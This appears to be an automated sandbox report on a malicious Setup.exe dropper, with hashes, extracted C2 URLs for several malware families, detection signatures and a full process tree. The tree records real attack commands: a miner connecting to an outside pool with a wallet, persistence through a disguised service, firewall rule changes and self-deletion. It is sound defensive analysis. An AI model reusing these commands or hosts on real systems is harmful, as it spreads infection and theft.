Analysis

  • max time kernel
    343s
  • max time network
    467s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    06-03-2021 07:08

Errors

Reason
Machine shutdown

General

  • Target

    Setup.exe

  • Size

    4.2MB

  • MD5

    afd51e2ff7beac4d0c88d8f872d6d0d5

  • SHA1

    185fd4793db912410de63ac7a5a3b1ac9c266b38

  • SHA256

    cecdc8bd4344647b2182696cf04e1db4fbb29aee6b46811999008901910b5c19

  • SHA512

    eed33fd55a82fceea21f522a6c59d3e318d7e73c86e9b1f039e37b3ccd6c0b58df24dabfcb71d8ccb818dd236cc329804d6a947240619ad26aed8713fe19a418

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

e71b51d358b75fe1407b56bf2284e3fac50c860f

Attributes
  • url4cnc

    https://telete.in/oidmrwednesday

rc4.plain
rc4.plain

Extracted

Family

buer

C2

securedocumentsholding.com

Signatures

  • Buer

    Buer is a new modular loader first seen in August 2019.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 3 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Buer Loader 1 IoCs

    Detects Buer loader in memory or disk.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Modifies boot configuration data using bcdedit 15 IoCs
  • Nirsoft 6 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 41 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 20 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 12 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 61 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 57 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Script User-Agent 5 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:3996
    • C:\Windows\SysWOW64\msiexec.exe
      msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
      2⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3820
    • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
      C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of SetThreadContext
      • Checks SCSI registry key(s)
      • Suspicious use of WriteProcessMemory
      PID:1592
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        3⤵
          PID:3396
        • C:\Users\Admin\AppData\Roaming\1615018414768.exe
          "C:\Users\Admin\AppData\Roaming\1615018414768.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018414768.txt"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:3384
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe"
          3⤵
            PID:2596
          • C:\Users\Admin\AppData\Roaming\1615018419737.exe
            "C:\Users\Admin\AppData\Roaming\1615018419737.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018419737.txt"
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3884
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe"
            3⤵
              PID:2496
            • C:\Users\Admin\AppData\Roaming\1615018425096.exe
              "C:\Users\Admin\AppData\Roaming\1615018425096.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018425096.txt"
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:2028
            • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
              C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
              3⤵
              • Executes dropped EXE
              PID:2168
            • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
              "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              PID:2416
            • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
              C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
              3⤵
              • Executes dropped EXE
              PID:2296
              • C:\Users\Admin\AppData\Local\Temp\is-F0LFM.tmp\23E04C4F32EF2158.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-F0LFM.tmp\23E04C4F32EF2158.tmp" /SL5="$601CA,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                4⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:2140
                • C:\Program Files (x86)\DTS\seed.sfx.exe
                  "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  PID:4004
                  • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                    "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: MapViewOfSection
                    PID:2708
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                  5⤵
                  • Checks computer location settings
                  PID:1252
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
              3⤵
                PID:2904
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:1852
            • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
              C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
              2⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Checks SCSI registry key(s)
              • Suspicious use of WriteProcessMemory
              PID:2112
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1780
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  4⤵
                  • Kills process with taskkill
                  PID:2772
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:648
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:2392
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:752
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1 -n 3
                3⤵
                • Runs ping.exe
                PID:3192
          • C:\Windows\system32\msiexec.exe
            C:\Windows\system32\msiexec.exe /V
            1⤵
            • Enumerates connected drives
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Windows\syswow64\MsiExec.exe
              C:\Windows\syswow64\MsiExec.exe -Embedding FC13F1CFC6A01F195462F48BA3316637 C
              2⤵
              • Loads dropped DLL
              PID:2300
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
            1⤵
            • Drops file in Windows directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:3664
          • C:\Windows\system32\browser_broker.exe
            C:\Windows\system32\browser_broker.exe -Embedding
            1⤵
            • Modifies Internet Explorer settings
            PID:1880
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies registry class
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2472
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            PID:4080
          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
            1⤵
            • Modifies registry class
            PID:4384
          • C:\Users\Admin\AppData\Local\Temp\EA81.exe
            C:\Users\Admin\AppData\Local\Temp\EA81.exe
            1⤵
            • Executes dropped EXE
            • Adds Run key to start application
            PID:4480
            • C:\Windows\SysWOW64\icacls.exe
              icacls "C:\Users\Admin\AppData\Local\4c8c8c43-19ca-469f-a92f-e9d42db7d04a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
              2⤵
              • Modifies file permissions
              PID:4572
            • C:\Users\Admin\AppData\Local\Temp\EA81.exe
              "C:\Users\Admin\AppData\Local\Temp\EA81.exe" --Admin IsNotAutoStart IsNotTask
              2⤵
              • Executes dropped EXE
              PID:4604
              • C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin1.exe
                "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin1.exe"
                3⤵
                • Executes dropped EXE
                PID:4900
              • C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin2.exe
                "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin2.exe"
                3⤵
                • Executes dropped EXE
                PID:4952
              • C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe
                "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe"
                3⤵
                • Executes dropped EXE
                PID:4984
                • C:\Windows\SysWOW64\cmd.exe
                  /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe
                  4⤵
                    PID:4908
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 3
                      5⤵
                      • Delays execution with timeout.exe
                      PID:4016
                • C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe
                  "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks processor information in registry
                  PID:5048
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe" & del C:\ProgramData\*.dll & exit
                    4⤵
                      PID:5000
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im 5.exe /f
                        5⤵
                        • Kills process with taskkill
                        PID:2308
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 6
                        5⤵
                        • Delays execution with timeout.exe
                        PID:3336
              • C:\Users\Admin\AppData\Local\Temp\F782.exe
                C:\Users\Admin\AppData\Local\Temp\F782.exe
                1⤵
                • Executes dropped EXE
                PID:4628
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c echo MFbR
                  2⤵
                    PID:4692
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
                    2⤵
                      PID:4740
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd
                        3⤵
                          PID:4800
                          • C:\Windows\SysWOW64\findstr.exe
                            findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
                            4⤵
                              PID:6232
                            • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                              Sui.com Benedetto.txt
                              4⤵
                                PID:7376
                                • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                  C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
                                  5⤵
                                    PID:6248
                                    • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                      C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
                                      6⤵
                                        PID:7768
                            • C:\Users\Admin\AppData\Local\Temp\196.exe
                              C:\Users\Admin\AppData\Local\Temp\196.exe
                              1⤵
                              • Executes dropped EXE
                              PID:4932
                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                              1⤵
                              • Modifies registry class
                              PID:4240
                            • C:\Users\Admin\AppData\Local\Temp\659.exe
                              C:\Users\Admin\AppData\Local\Temp\659.exe
                              1⤵
                              • Executes dropped EXE
                              PID:4208
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\eijeimm\
                                2⤵
                                  PID:4708
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vuikyvwo.exe" C:\Windows\SysWOW64\eijeimm\
                                  2⤵
                                    PID:4788
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" create eijeimm binPath= "C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe /d\"C:\Users\Admin\AppData\Local\Temp\659.exe\"" type= own start= auto DisplayName= "wifi support"
                                    2⤵
                                      PID:4916
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" description eijeimm "wifi internet conection"
                                      2⤵
                                        PID:2060
                                      • C:\Windows\SysWOW64\sc.exe
                                        "C:\Windows\System32\sc.exe" start eijeimm
                                        2⤵
                                          PID:1824
                                        • C:\Windows\SysWOW64\netsh.exe
                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                          2⤵
                                            PID:4196
                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                          1⤵
                                          • Modifies registry class
                                          PID:3824
                                        • C:\Users\Admin\AppData\Local\Temp\1668.exe
                                          C:\Users\Admin\AppData\Local\Temp\1668.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Checks whether UAC is enabled
                                          PID:1716
                                        • C:\Users\Admin\AppData\Local\Temp\17FF.exe
                                          C:\Users\Admin\AppData\Local\Temp\17FF.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5060
                                          • C:\Users\Admin\AppData\Local\Temp\17FF.exe
                                            C:\Users\Admin\AppData\Local\Temp\17FF.exe
                                            2⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:4996
                                        • C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe
                                          C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe /d"C:\Users\Admin\AppData\Local\Temp\659.exe"
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3200
                                          • C:\Windows\SysWOW64\svchost.exe
                                            svchost.exe
                                            2⤵
                                            • Drops file in System32 directory
                                            • Modifies data under HKEY_USERS
                                            PID:3500
                                            • C:\Windows\SysWOW64\svchost.exe
                                              svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                                              3⤵
                                                PID:8
                                          • C:\Users\Admin\AppData\Local\Temp\201E.exe
                                            C:\Users\Admin\AppData\Local\Temp\201E.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Adds Run key to start application
                                            PID:4808
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:2412
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              2⤵
                                              • Executes dropped EXE
                                              PID:4880
                                          • C:\Users\Admin\AppData\Local\Temp\2C35.exe
                                            C:\Users\Admin\AppData\Local\Temp\2C35.exe
                                            1⤵
                                            • Executes dropped EXE
                                            PID:3832
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 360
                                              2⤵
                                              • Program crash
                                              PID:4968
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 336
                                              2⤵
                                              • Program crash
                                              PID:5072
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 368
                                              2⤵
                                              • Program crash
                                              PID:3156
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 648
                                              2⤵
                                              • Program crash
                                              PID:5104
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 660
                                              2⤵
                                              • Program crash
                                              PID:2176
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 716
                                              2⤵
                                              • Program crash
                                              PID:1268
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 676
                                              2⤵
                                              • Program crash
                                              PID:348
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 752
                                              2⤵
                                              • Program crash
                                              PID:2004
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 712
                                              2⤵
                                              • Program crash
                                              PID:3340
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 732
                                              2⤵
                                              • Program crash
                                              PID:3816
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 804
                                              2⤵
                                              • Program crash
                                              PID:4796
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 768
                                              2⤵
                                              • Program crash
                                              PID:1348
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 664
                                              2⤵
                                              • Program crash
                                              PID:4468
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 732
                                              2⤵
                                              • Program crash
                                              PID:5032
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 772
                                              2⤵
                                              • Program crash
                                              PID:4320
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 616
                                              2⤵
                                              • Program crash
                                              PID:4184
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 692
                                              2⤵
                                              • Program crash
                                              PID:4092
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 600
                                              2⤵
                                              • Program crash
                                              PID:2832
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 772
                                              2⤵
                                              • Program crash
                                              PID:4664
                                            • C:\Users\Admin\AppData\Local\Temp\2C35.exe
                                              "C:\Users\Admin\AppData\Local\Temp\2C35.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Windows security modification
                                              • Adds Run key to start application
                                              • Drops file in Windows directory
                                              PID:1836
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 332
                                                3⤵
                                                • Program crash
                                                PID:2984
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 320
                                                3⤵
                                                • Program crash
                                                PID:5008
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 312
                                                3⤵
                                                • Program crash
                                                PID:4584
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 596
                                                3⤵
                                                • Program crash
                                                PID:4052
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 632
                                                3⤵
                                                • Program crash
                                                PID:4712
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 668
                                                3⤵
                                                • Program crash
                                                PID:2360
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 700
                                                3⤵
                                                • Program crash
                                                PID:2828
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 684
                                                3⤵
                                                • Program crash
                                                PID:4368
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 564
                                                3⤵
                                                • Program crash
                                                PID:4948
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 752
                                                3⤵
                                                • Program crash
                                                PID:2588
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 768
                                                3⤵
                                                • Program crash
                                                PID:3224
                                              • C:\Windows\System32\cmd.exe
                                                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                3⤵
                                                  PID:4492
                                                  • C:\Windows\system32\netsh.exe
                                                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                    4⤵
                                                    • Modifies data under HKEY_USERS
                                                    PID:5132
                                                • C:\Windows\rss\csrss.exe
